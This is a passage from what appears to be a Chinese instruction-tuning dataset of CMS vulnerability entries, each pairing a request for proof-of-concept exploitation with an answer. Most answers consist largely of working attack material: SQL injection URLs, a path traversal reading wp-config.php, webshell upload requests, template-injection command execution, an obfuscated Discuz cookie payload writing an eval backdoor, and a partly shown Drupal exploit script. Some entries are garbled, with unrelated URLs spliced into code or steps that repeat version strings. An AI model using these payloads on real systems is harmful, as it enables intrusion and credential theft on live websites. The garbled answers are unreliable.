Squiz.PHP.CommentedOutCode\n\t\t\t\t\t\t\t/* echo $key.PHP_EOL; */\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\t$array = $to_return;\n\t\t\t\t} else {\n\t\t\t\t\tdie();\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t$array = self::get_statistics_object();\n\t\t\t\tif ( is_array( $instances ) && ! empty( $instances ) ) {\n\t\t\t\t\t$array['instances'] = array();\n\t\t\t\t\tforeach ( $instances as $opt_name => $data ) {\n\t\t\t\t\t\t$array['instances'][] = $opt_name;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t$array['key'] = md5( Redux_Functions_Ex::hash_key() );\n\t\t\t}\n\n\t\t\tksort( $array ); // Let's make that pretty.\n\n\t\t\t// phpcs:ignored WordPress.PHP.NoSilencedErrors, WordPress.Security.EscapeOutput\n\t\t\techo @htmlspecialchars( @wp_json_encode( $array, true ), ENT_QUOTES );\n\n\t\t\tdie();\n\t\t}\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314.md"}
    77. 

  77. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633\n漏洞描述:WordPress All-in-One Video 插件 Gallery video.php文件中存在SSRF以及任意文件读取漏洞,攻击者通过发送特定的请求包读取任意文件\n影响版本:``` WordPress All-in-One Video Gallery <= 2.6.0 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2022-2633\n【POC利用方法】\n1. WordPress All-in-One Video Gallery <= 2.6.0\n2. All-in-One Video Gallery\n3. if ( is_numeric( $_GET['dl'] ) ) {\n\t\t\t$file = get_post_meta( (int) $_GET['dl'], 'mp4', true );\n\t\t} else {\n\t\t\t$file = base64_decode( $_GET['dl'] );\n\t\t}\n\n\t\tif ( empty( $file ) ) {\n\t\t\tdie( esc_html__( 'Download file URL is empty.', 'all-in-one-video-gallery' ) );\n           \texit;\n        }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633.md"}
    78. 

  78. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:狮子鱼CMS ApiController.class.php SQL注入漏洞\n漏洞描述:狮子鱼CMS ApiController.class.php  参数过滤存在不严谨,导致SQL注入漏洞\n影响版本:``` 狮子鱼CMS ```\n网络测绘:``` \"/seller.php?s=/Public/login\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. \"/seller.php?s=/Public/login\"\n2. public function goods_detail()\n\t{\n\t\t$goods_id = I('get.goods_id');\n\t\t//gallery =>img_url\n\t\t//goods goods.goods_desc  goods_name group_price  market_price  sell_count group_number \n\t\t\n\t\t$sql=\"select g.*,gd.description,gd.summary,gd.tag from \".\n\t\tC('DB_PREFIX').\"goods g,\".C('DB_PREFIX').\"goods_description gd where g.goods_id=gd.goods_id and g.goods_id=\".$goods_id;\n\t\t\n\t\t$goods_arr=M()->query($sql);\n\t\t\n\t\t$qian=array(\"\\r\\n\");\n\t\t$hou=array(\"<br/>\");\n\t\t$goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']); \n\t\t\n\t\t$sql=\"select image from \".C('DB_PREFIX').\"goods_image where goods_id=\".$goods_id;\n\t\t$goods_image=M()->query($sql);\n\t\t\n\t\t$gallery = array();\n\t\t$default_image = '';\n\t\tforeach($goods_image as $val)\n\t\t{\n\t\t\t$val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/ http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/'.$val['image'];\n\t\t\t\n\t\t\tif(empty($default_image))\n\t\t\t{\n\t\t\t\t$default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));\n\t\t\t}\n\t\t\t\n\t\t\t$gallery[] = array('img_url' => $val['img_url']); \n\t\t}\n\t\t\n\t\t$goods = $goods_arr[0];\n3. https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/狮子鱼CMS ApiController.class.php SQL注入漏洞.md"}
    79. 

  79. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:YzmCMS Version 小于V5.8正式版 后台采集模块 SSRF漏洞\n漏洞描述:[YzmCMS内容管理系统](https://www.yzmcms.com/)是一款**轻量级开源内容管理系统**,它采用自主研发的框架**YZMPHP**开发。程序基于PHP+Mysql架构,并采用MVC框架式开发的一款高效开源的内容管理系统,可运行在Linux、Windows、MacOSX、Solaris等各种平台上。 源码存在协议识别的缺陷,导致存在SSRF漏洞\n影响版本:``` YzmCMS version <  V5.8正式版 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. YzmCMS version <  V5.8正式版\n2. 可以看到这里只检测了前4位是否为 http,使用 httpxxx 即可绕过\n3. 点击采集读取根目录下的 Flag\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/YzmCMS Version 小于V5.8正式版 后台采集模块 SSRF漏洞.md"}
    80. 

  80. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342\n漏洞描述:- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt\n网络测绘:``` \"Anchor CMS\" && body=\"themes/default/img/favicon.png\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2020-23342\n【POC利用方法】\n1. \"Anchor CMS\" && body=\"themes/default/img/favicon.png\"\n2. <img src=\"http://target/anchor/index.php/admin/users/delete/21\">\n3. **exploit.html:**\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md"}
    81. 

  81. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WeiPHP3.0 session_id 任意文件上传漏洞\n漏洞描述:WeiPHP3.0 session_id 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件\n影响版本:``` WeiPHP3.0 ```\n网络测绘:``` app=\"weiphp\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"weiphp\"\n2. POST /index.php?s=%2FHome%2FFile%2Fupload%2Fsession_id%2Fscevs8hub3m5ogla05a421hb42.html HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 831\nContent-Type: multipart/form-data; boundary=------------------------e37a54d7d5380c9f\nAccept-Encoding: gzip\n\n--------------------------e37a54d7d5380c9f\nContent-Disposition: form-data; name=\"download\"; filename=\"882176.php\"\nContent-Type: application/octet-stream\n\n<?php\nphpinfo();\n\n--------------------------e37a54d7d5380c9f--\n3. User-Agent: Go-http-client/1.1\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WeiPHP3.0 session_id 任意文件上传漏洞.md"}
    82. 

  82. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PbootCMS domain SQL注入漏洞\n漏洞描述:PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息\n影响版本:``` PbootCMS <= 3.0.5 ```\n网络测绘:``` app=\"PBOOTCMS\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. PbootCMS <= 3.0.5\n2. app=\"PBOOTCMS\"\n3. ')%0aand%0a(SELECT%0acount(tbl_name)%0aFROM%0asqlite_master%0aWHERE%0atype%3d'ta ble'%0aand%0atbl_name%0aNOT%0alike%0a'sqlite_%')<40--\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/PbootCMS domain SQL注入漏洞.md"}
    83. 

  83. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DedeCMS 5.7SP2 代码执行漏洞 CVE-2019-8933\n漏洞描述:Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)公司的一套基于 PHP 的开源内容管理系统(CMS)。该系统具有内容发布、内容管理、内容编辑和内容检索等功用。 DedeCMS 5.7 SP2 版本中存在漏洞。远程攻击者可经过在添加新模板时,将文件名 ../index.html 更改成 ../index.php 应用该漏洞向 uploads/ 目录上传 .php 文件并执行该文件。\n影响版本:``` DedeCMS 5.7 SP2 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2019-8933\n【POC利用方法】\n1. DedeCMS 5.7 SP2\n2. 选择主页模板:default/newtpl.htm\n主页位置:更改.html后缀为.php\n首页模式:生成静态\n3. http://<YOUR-IP>/index.php\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/DedeCMS 5.7SP2 代码执行漏洞 CVE-2019-8933.md"}
    84. 

  84. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OKLite 1.2.25 后台模块导入 任意文件上传 CVE-2019-16131\n漏洞描述:OKLite v1.2.25 后台模块导入过滤不完善导致可以上传恶意木马文件\n影响版本:``` OKLite 1.2.25 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2019-16131\n【POC利用方法】\n1. OKLite 1.2.25\n2. public function zipfile($input,$folder='')\n\t{\n\t\tif(!$input){\n\t\t\treturn array('status'=>'error','content'=>P_Lang('未指定表单名称'));\n\t\t}\n\t\t//如果未指定存储文件夹,则使用\n\t\tif(!$folder){\n\t\t\t$folder = 'data/cache/';\n\t\t}\n\t\t$this->cateid = 0;\n\t\t$this->set_dir($folder);\n\t\t$this->set_type('zip');\n\t\t$this->cate = array('id'=>0,'filemax'=>104857600,'root'=>$folder,'folder'=>'/','filetypes'=>'zip');\n\t\tif(isset($_FILES[$input])){\n\t\t\t$rs = $this->_upload($input);\n\t\t}else{\n\t\t\t$rs = $this->_save($input);\n\t\t}\n\t\tif($rs['status'] != 'ok'){\n\t\t\treturn $rs;\n\t\t}\n\t\t$rs['cate'] = $this->cate;\n\t\treturn $rs;\n\t}\n3. <?php phpinfo();?>\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OKLite 1.2.25 后台模块导入 任意文件上传 CVE-2019-16131.md"}
    85. 

  85. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119\n漏洞描述:WordPress Simple File List插件 ee-downloader.php文件存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的任意文件\n影响版本:``` WordPress Simple File List < 3.2.8 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2022-1119\n【POC利用方法】\n1. WordPress Simple File List < 3.2.8\n2. <?php // Simple File List - ee-downloader.php - rev 1.19 - mitchellbennis@gmail.com\n\n// Force File to Download\n// This script is accessed via javascript on ee-download.php \n\n$eeFile =  filter_var($_GET['eeFile'], FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_LOW);\n\nif(is_readable($eeFile)) {\n\n    header('Pragma: public'); // required\n    header('Expires: 0'); // no cache\n    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');\n    header('Last-Modified: '. gmdate ('D, d M Y H:i:s', filemtime ($eeFile)) .' GMT');\n    header('Cache-Control: private',false);\n    header('Content-Type: ' . mime_content_type($eeFile) );\n    header('Content-Disposition: attachment; filename=\"'. basename($eeFile) .'\"');\n    // header('Content-Transfer-Encoding: binary');\n    header('Content-Length: '. filesize($eeFile)); // provide file size\n    header('Connection: close');\n    readfile($eeFile); // Start the download\n\n}\n?>\n3. /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md"}
    86. 

  86. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:快排CMS Socket.php 日志信息泄露漏洞\n漏洞描述:快排CMS 默认开启日志记录,由于日志名为时间作为文件名,造成管理员的Cookie泄露\n影响版本:``` 快排 CMS <= 1.2 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 快排 CMS <= 1.2\n2. runtime/log/202104/06.log\n3. https://gitee.com/qingzhanwang/kpcms\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/快排CMS Socket.php 日志信息泄露漏洞.md"}
    87. 

  87. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:原创先锋 后台管理平台 未授权访问漏洞\n漏洞描述:原创先锋 后台管理平台 存在未授权访问漏洞,攻击者通过漏洞可以任意接管账户权限\n影响版本:``` 原创先锋 后台管理平台 ```\n网络测绘:``` body=\"https://www.bjycxf.com\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 原创先锋 后台管理平台\n2. body=\"https://www.bjycxf.com\"\n3. /admin/admin/admin_list.html\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/原创先锋 后台管理平台 未授权访问漏洞.md"}
    88. 

  88. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ke361 AuthManagerController.class.php 后台SQL注入漏洞\n漏洞描述:Ke361 AuthManagerController.class.php uid参数存在 SQL注入漏洞,通过漏洞可以获取数据库敏感信息\n影响版本:``` Ke361 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. /admin.php?s=/AuthManager/group/uid/1')%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+\n2. https://gitee.com/jcove/ke361\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Ke361 AuthManagerController.class.php 后台SQL注入漏洞.md"}
    89. 

  89. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PbootCMS V3.1.2 正则绕过 RCE 漏洞\n漏洞描述:PbootCMS 项目路径下 /common/function.php 中存在两个函数 get_lg 和 get_backurl,可绕过正则处理,进而执行命令。\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. ?snakin=}{pboot:if((get_lg/*-*/())/**/(get_backurl/*-*/()))}{/pboot:if}&backurl=;id\n2. GET /index.php/keyword?keyword=}{pboot:if((get_lg/*aaa-*/())/**/(get_backurl/*aaa-*/()))}123321aaa{/pboot:if}&backurl=;id HTTP/1.1\nHost: your-ip\nAccept: text/plain, */*; q=0.01\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\nX-Requested-With: XMLHttpRequest\nReferer: your-ip\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: lg=system; PbootSystem=8ea446nv2usihctikbjm7qg6c6\nConnection: close\n3. GET /?member/login/?a=}{pboot:if((get_lg/*aaa-*/())/**/(\"whoami\"))}{/pboot:if} HTTP/1.1\nHost: your-ip\nAccept: text/plain, */*; q=0.01\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\nX-Requested-With: XMLHttpRequest\nReferer:your-ip\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: lg=system; PbootSystem=8ea446nv2usihctikbjm7qg6c6\nConnection: close\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/PbootCMS V3.1.2 正则绕过 RCE 漏洞.md"}
    90. 

  90. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Discuz!X3.4 后台修改UCenter配置getshell漏洞\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. <?php\n$uc_key=\"123456\";//此处填写刚才UCenter设置的值\n$time = time() + 720000;\n$str = \"time=\".$time.\"&action=updateapps\";\n$code = authcode($str,\"ENCODE\",$uc_key);\n$code = str_replace('+','%2b',$code);\n$code = str_replace('/','%2f',$code);\necho $code;\n\nfunction authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {\n  $ckey_length = 4;\n  $key = md5($key != '' ? $key : '123456');\n  $keya = md5(substr($key, 0, 16));\n  $keyb = md5(substr($key, 16, 16));\n  $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';\n\n  $cryptkey = $keya.md5($keya.$keyc);\n  $key_length = strlen($cryptkey);\n\n  $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;\n  $string_length = strlen($string);\n\n  $result = '';\n  $box = range(0, 255);\n\n  $rndkey = array();\n  for($i = 0; $i <= 255; $i++) {\n    $rndkey[$i] = ord($cryptkey[$i % $key_length]);\n  }\n\n  for($j = $i = 0; $i < 256; $i++) {\n    $j = ($j + $box[$i] + $rndkey[$i]) % 256;\n    $tmp = $box[$i];\n    $box[$i] = $box[$j];\n    $box[$j] = $tmp;\n  }\n\n  for($a = $j = $i = 0; $i < $string_length; $i++) {\n    $a = ($a + 1) % 256;\n    $j = ($j + $box[$a]) % 256;\n    $tmp = $box[$a];\n    $box[$a] = $box[$j];\n    $box[$j] = $tmp;\n    $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));\n  }\n\n  if($operation == 'DECODE') {\n    if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {\n      return substr($result, 26);\n    } else {\n      return '';\n    }\n  } else {\n    return $keyc.str_replace('=', '', base64_encode($result));\n  }\n}\n?>\n2. GET /discuz!x3.4/api/uc.php?code=ac7091oTLALD6X24gZeiX5YmqDkLnX4ivIqx1jDnA7NhUAcHHOX3fWWOLWpGwSwfQfz4r5Pgf86bRlDTRkQ% HTTP/1.1\nHost: your-ip\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,ar;q=0.8\nConnection: close\nContent-Length: 133\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<root>\n<item id=\"UC_API\">http://your-ip/discuz!x3.4/uc_server</item>\n</root>\n3. http://your-ip/discuz!x3.4/config/config_ucenter.php\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Discuz!X3.4 后台修改UCenter配置getshell漏洞.md"}
    91. 

  91. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress WP_Query SQL 注入漏洞 CVE-2022-21661\n漏洞描述:`WordPress`是一个用`PHP`编写的免费开源内容管理系统,由于`clean_query`函数的校验不当,导致了可能通过插件或主题以某种方式从而触发`SQL`注入的情况。这已经在`WordPress5.8.3`中进行了修复。影响版本可以追溯到`3.7.37`。 参考链接: - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84\n影响版本:``` WordPress < 5.8.3 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2022-21661\n【POC利用方法】\n1. WordPress < 5.8.3\n2. POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 130\n\naction=test&data={\"tax_query\":[{\"field\":\"term_taxonomy_id\",\"terms\":[\"1) and extractvalue(rand(),concat(0x5e,(select group_concat(schema_name) from information_schema.SCHEMATA)))#\"]}]}\n3. - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress WP_Query SQL 注入漏洞 CVE-2022-21661.md"}
    92. 

  92. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Discuz 7.x/6.x 全局变量防御绕过导致代码执行\n漏洞描述:由于php5.3.x版本里php.ini的设置里`request_order`默认值为GP,导致`$_REQUEST`中不再包含`$_COOKIE`,也就是说默认配置下`$_REQUEST`只包含`$_GET`和`$_POST`而不包括$_COOKIE。 我们通过在Cookie中传入`$GLOBALS`来覆盖全局变量,造成代码执行漏洞。 具体原理请参考: - https://www.secpulse.com/archives/2338.html\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. GET /viewthread.php?tid=10&extra=page%3D1 HTTP/1.1\nHost: your-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nCookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();\nConnection: close\n3. Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Discuz 7.x6.x 全局变量防御绕过导致代码执行.md"}
    93. 

  93. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WeiPHP5.0 bind_follow SQL注入漏洞\n漏洞描述:Weiphp5.0 所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响,前台后台均存在注入。\n影响版本:``` Weiphp5.0 ```\n网络测绘:``` app=\"WeiPHP\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"WeiPHP\"\n2. /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WeiPHP5.0 bind_follow SQL注入漏洞.md"}
    94. 

  94. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress SuperForms 4.9 任意文件上传到远程代码执行\n漏洞描述:SuperForms官方链接:https://renstillmann.github.io/super-forms/#/ 参考链接: - https://www.exploit-db.com/exploits/49490\n影响版本:``` All (<= 4.9.X) ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. All (<= 4.9.X)\n2. inurl:\"/wp-content/plugins/super-forms/\"\n3. POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1\n <=== exploit end point\nHost: localhost\nUser-Agent: UserAgent\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data;\nboundary=---------------------------423513681827540048931513055996\nContent-Length: 7058\nOrigin: localhost\nConnection: close\nReferer: localhost\nCookie: \n\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"accept_file_types\"\n\njpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF                        <=======\ninject extension (|PHP4) to validate file to upload\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"max_file_size\"\n\n8000000\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"image_library\"\n\n0\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"files[]\";\nfilename=\"filename.(extension)\"    <====   inject code extension (.php4)\nfor example\nContent-Type: application/pdf\n\nEvil codes to be uploaded\n\n-----------------------------423513681827540048931513055996--\n\n# Uploaded Malicious File can  be Found in :\n/wp-content/uploads/superforms/2021/01/<id>/filename.php4\nu can get <id> from server reply .\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md"}
    95. 

  95. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Drupal XSS漏洞 CVE-2019-6341\n漏洞描述:影响软件:Drupal 方式:通过文件模块或者子系统上传恶意文件触发XSS漏洞 参考链接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) 效果:JS代码执行(Cookies 资料窃取、会话劫持、钓鱼欺骗、网页挂马等)\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2019-6341\n【POC利用方法】\n1. docker-compose up -d\n2. php cve-2019-6341-exp.php 192.168.11.1 8080\n3. <?php\n/*\nusage: php poc.php <target-ip>\n\nDate: 1 March 2019\nExploit Author: TrendyTofu\nOriginal Discoverer: Sam Thomas\nVersion: <= Drupal 8.6.2\nTested on: Drupal 8.6.2 Ubuntu 18.04 LTS x64 with ext4.\nTested not wokring on: Drupal running on MacOS with APFS\nCVE : CVE-2019-6341\nReference: https://www.zerodayinitiative.com/advisories/ZDI-19-291/\n\n*/\n\n$host = $argv[1];\n$port = 80;\n\n$pk =   \"GET /user/register HTTP/1.1\\r\\n\".\n\t\"Host: \".$host.\"\\r\\n\".\n\t\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\".\n\t\"Accept-Language: en-US,en;q=0.5\\r\\n\".\n\t\"Referer: http://\".$host.\"/user/login\\r\\n\".\n\t\"Connection: close\\r\\n\\r\\n\";\n\n$fp = fsockopen($host,$port,$e,$err,1);\nif (!$fp) {die(\"not connected\");}\nfputs($fp,$pk);\n$out=\"\";\nwhile (!feof($fp)){\n  $out.=fread($fp,1);\n}\nfclose($fp);\n\npreg_match('/name=\"form_build_id\" value=\"(.*)\"/', $out, $match);\n$formid = $match[1];\n//var_dump($formid);\n//echo \"form id is:\". $formid;\n//echo $out.\"\\n\";\nsleep(1);\n\n$data = \n\"Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325\\r\\n\".\n\"Connection: close\\r\\n\".\n\"\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"mail\\\"\\r\\n\".\n\"\\r\\n\".\n\"test324@example.com\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\".\n\"\\r\\n\".\n\"test2345\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"files[user_picture_0]\\\"; filename=\\\"xxx\\xc0.gif\\\"\\r\\n\".\n\"Content-Type: image/gif\\r\\n\".\n\"\\r\\n\".\n\"GIF\\r\\n\".\n\"<HTML>\\r\\n\".\n\"\t<HEAD>\\r\\n\".\n\"\t\t<SCRIPT>alert(123);</SCRIPT>\\r\\n\".\n\"\t</HEAD>\\r\\n\".\n\"\t<BODY>\\r\\n\".\n\"\t</BODY>\\r\\n\".\n\"</HTML>\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"user_picture[0][fids]\\\"\\r\\n\".\n\"\\r\\n\".\n\"\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"user_picture[0][display]\\\"\\r\\n\".\n\"\\r\\n\".\n\"1\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"form_build_id\\\"\\r\\n\".\n\"\\r\\n\".\n//\"form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk\\r\\n\".\n$formid.\"\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: 